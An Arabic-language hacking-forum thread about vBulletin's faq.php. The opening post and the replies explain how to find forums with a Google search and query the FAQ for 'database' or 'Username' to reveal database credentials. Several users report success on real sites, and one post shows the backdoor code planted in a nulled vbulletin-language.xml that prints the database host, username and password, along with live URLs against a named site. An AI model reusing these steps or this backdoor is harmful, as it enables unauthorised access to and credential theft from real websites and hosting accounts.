faq.php

[CENTER][SIZE=“5”][CENTER]السلام عليكم

كيفكم حبايبي

انا مدري ان كان الثغره هذه موجوده من اول ولا لا

المهم بطرح الثغره

الثغره لسكربت التعليمات المنتدى

faq.php

دورك قوقل

vb/faq.php

بعد الدخول الى السكربت ضح في البحث

Username

راح يطلع لك الباسورد في بعض المنتديات

تقبلو تحياتي

Mr VIrus[/SIZE][/CENTER]

مشكور حبيبى بس انتا بتكلم فى ايـه احنا فى 2011

Cl0sed >>>>>>>>>>

الثغره فعاله فى مواقع كتير فعلا
تفتح ملف faq.php
وتكتب database
وتخلى لغة المنتدى انجليزى
هتلاقى بيانات القاعده قدامك
مشكور يا حج

فى النسخ الملغمة فقط وليس كل النسخ

الله أعلم
بس بتظبط معايا كتير
آخرها النهارده

موقع مش صغير وعلى سيرفر فيه مواقع كبيره
وطلع الباس هو نفسه باس السى بانل
ممكن تكون النسخه ملغومه زى ما بتقول

الثغرة شغالة عادي … ضبطت معي أكثر من 30 مرة … نسخ إصدار 3.8.6
و اذا كان المنتدى بالعربية حول اللغة الى إنجلزية

يجوز انا اللى حظى كان وحش مع الثغره ولا مره تظبط معى >>>>>>>> فقرى فقرى يعنى هههههههههه

الثغرة من هنا http://www.exploit-db.com/exploits/14455/

كان هنا التلغيم <code class=“plain plain”>vbulletin-language.xml
اضاف الملغم كود
</code><code class=“plain plain”>
<!–[CDATA[Database Name: {$vbulletin->config[‘Database’]–></code><table><tbody><tr><td class=“content”><code class=“plain plain”></code>

<code class="plain plain">
<!--[CDATA[Database Name:  {$vbulletin->config['Database']--></phrase></code><table><tbody><tr><td class="content"><code class="plain plain">Database Host: {$vbulletin->config['MasterServer']['servername']}
</code></td></tr></tbody></table>
<table><tbody><tr><td class="content"><code class="plain plain">Database Port: {$vbulletin->config['MasterServer']['port']}
</code></td></tr></tbody></table>
<table><tbody><tr><td class="content"><code class="plain plain">Database Username: {$vbulletin->config['MasterServer']['username']}
</code></td></tr></tbody></table>
<code class="plain plain">Database Password: {$vbulletin->config['MasterServer']['password']}]]></code>

</td></tr></tbody></table><code class=“plain plain”>
بس موش ثغرة فى النسخة الاصلية فقط المنزوعة

مثل
http://www.hardcoretv.info/faq.php?s=&do=search&q=database&match=all&titlesonly=0

وهذا مثل مقلت انت
http://www.hardcoretv.info/faq.php?do=search&q=Username&match=all&titlesonly=0
</code>

تمام كده يا ريمون
بس وربنا الواد اللى لغم ده دماغه شغاله :))

يس أخي :smiley:

هو لى نزع الكود نزعها ببلاش :smiley:

يلغم السكربت عشان يخد أتعابو :slight_smile:

وكثير من الشباب بيبرمجو موديلات او سكربتات بسيطة وبيلغموها بثغرة :rolleyes:

مثل هدا المقال
http://paltun.net/2011/01/خطورة-البرمجيات-و-السكربتات-المنزوعة/